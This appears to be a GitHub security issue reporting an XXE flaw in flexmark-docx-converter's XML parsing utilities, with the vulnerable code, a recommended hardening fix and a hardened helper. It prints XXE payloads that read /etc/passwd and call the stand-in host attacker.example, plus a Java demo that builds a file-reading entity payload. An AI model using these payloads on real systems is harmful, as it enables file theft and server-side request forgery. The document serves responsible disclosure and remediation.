XXE vulnerability in XmlFormatter and XmlDocxSorter (CWE-611) #676

@elarasu

Summary

XmlFormatter.format(String xml), XmlFormatter.formatDocumentBody(String xml), and XmlDocxSorter.sortDocumentParts(String xml) in flexmark-docx-converter create DocumentBuilderFactory instances without disabling external entity resolution or DOCTYPE declarations. This allows XML External Entity (XXE) attacks when the XML input originates from an untrusted source.

Vulnerable code

flexmark-docx-converter/src/main/java/com/vladsch/flexmark/docx/converter/util/XmlFormatter.java:24-44 (public API):

public static String format(String xml) {
    try {
        InputSource src = new InputSource(new StringReader(xml));
        Node document = DocumentBuilderFactory.newInstance().newDocumentBuilder().parse(src).getDocumentElement();
        ...
    }
}

No XXE hardening is applied. The Javadoc explicitly documents this as a public utility (String formattedXml = XmlFormatter.format("<tag><nested>hello</nested></tag>")) and references the Stack Overflow snippet it was copied from, which also lacks the hardening.

Same issue at XmlFormatter.formatDocumentBody:49:

DocumentBuilderFactory builderFactory = DocumentBuilderFactory.newInstance();
builderFactory.setNamespaceAware(false);
Document document = builderFactory.newDocumentBuilder().parse(src);

And XmlDocxSorter.sortDocumentParts:453:

DocumentBuilderFactory builderFactory = DocumentBuilderFactory.newInstance();
builderFactory.setNamespaceAware(false);
Document document = builderFactory.newDocumentBuilder().parse(src);

Impact

A consumer of flexmark-docx-converter who calls XmlFormatter.format(untrustedXml) (e.g. to pretty-print XML received from a user, an HTTP API, or a file upload) is vulnerable to:

  • File disclosure via <!ENTITY xxe SYSTEM "file:///etc/passwd">
  • SSRF via <!ENTITY xxe SYSTEM "http://attacker.example/">
  • DoS via billion-laughs entity expansion

The JDK's default DocumentBuilderFactory configuration resolves external entities, so explicit hardening is required.
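To make the file-disclosure case concrete, here is a minimal sketch that parses an entity-bearing document the same way the reported call sites do. The names XxeDemo, payloadFor, and parseWithDefaults are hypothetical and not part of flexmark; the temp file stands in for a sensitive local file. Whether the entity is actually resolved depends on the JDK version and any JAXP configuration in effect, so treat the printed result as something to check on your own runtime.

```java
import java.io.StringReader;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;

// Hypothetical demo class; none of these names exist in flexmark-docx-converter.
final class XxeDemo {

    /** Builds a document whose only text is an external entity pointing at the given file. */
    static String payloadFor(Path target) {
        return "<?xml version=\"1.0\"?>\n"
             + "<!DOCTYPE tag [ <!ENTITY xxe SYSTEM \"" + target.toUri() + "\"> ]>\n"
             + "<tag>&xxe;</tag>";
    }

    /** Parses with a default, unhardened factory, mirroring the pattern in the report. */
    static String parseWithDefaults(String xml) throws Exception {
        Document doc = DocumentBuilderFactory.newInstance()
                .newDocumentBuilder()
                .parse(new InputSource(new StringReader(xml)));
        return doc.getDocumentElement().getTextContent();
    }

    public static void main(String[] args) throws Exception {
        // Stand-in for a sensitive file such as /etc/passwd.
        Path secret = Files.createTempFile("xxe-demo", ".txt");
        Files.write(secret, "local file contents".getBytes(StandardCharsets.UTF_8));
        try {
            // If the parser resolves the entity, the file's contents appear in the parsed text.
            System.out.println("parsed text: " + parseWithDefaults(payloadFor(secret)));
        } finally {
            Files.delete(secret);
        }
    }
}
```

If the output contains the temp file's contents, any caller that passes untrusted XML through the same parsing pattern can be made to read local files on the attacker's behalf.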

Recommended fix

Apply OWASP-recommended hardening to every DocumentBuilderFactory.newInstance() in this module:

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
try {
    dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
    dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
    dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
    dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
    dbf.setXIncludeAware(false);
    dbf.setExpandEntityReferences(false);
} catch (ParserConfigurationException e) {
    // log and fall through
}
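Since the same hardening is needed at three call sites, one option is a single shared helper. The sketch below is an assumption about how that could look, not existing flexmark code: SafeXml, hardenedFactory, and rejectsDoctype are hypothetical names. Unlike the snippet above, it lets ParserConfigurationException propagate, so a parser that cannot be hardened is never used (a fail-closed design choice, also an assumption).

```java
import java.io.IOException;
import java.io.StringReader;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;

// Hypothetical helper; not part of flexmark-docx-converter.
final class SafeXml {

    /** Returns a factory with the hardening settings listed in this report applied. */
    static DocumentBuilderFactory hardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        // Reject any DOCTYPE outright; this alone blocks entity declarations.
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defense in depth in case DOCTYPEs are ever re-enabled.
        dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        dbf.setXIncludeAware(false);
        dbf.setExpandEntityReferences(false);
        return dbf;
    }

    /** True if the hardened parser refuses the document, false if it parses cleanly. */
    static boolean rejectsDoctype(String xml) {
        try {
            hardenedFactory().newDocumentBuilder().parse(new InputSource(new StringReader(xml)));
            return false;
        } catch (SAXException e) {
            return true; // parser refused the input
        } catch (ParserConfigurationException | IOException e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        String attack = "<!DOCTYPE t [<!ENTITY x SYSTEM \"file:///etc/passwd\">]><t>&x;</t>";
        System.out.println("attack rejected: " + rejectsDoctype(attack));
        System.out.println("plain XML rejected: " + rejectsDoctype("<t>ok</t>"));
    }
}
```

Each of the three call sites could then obtain its builder from hardenedFactory() instead of calling DocumentBuilderFactory.newInstance() directly, with setNamespaceAware(false) applied afterwards where the existing code needs it.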

Reference: OWASP XXE Prevention Cheat Sheet

CWE

CWE-611: Improper Restriction of XML External Entity Reference

How found

Discovered during a broad SAST sweep of the top-100 Java GitHub repos using cognium-ai + circle-ir (https://github.com/cogniumhq/circle-ir). Happy to share the analyzer trace if useful.
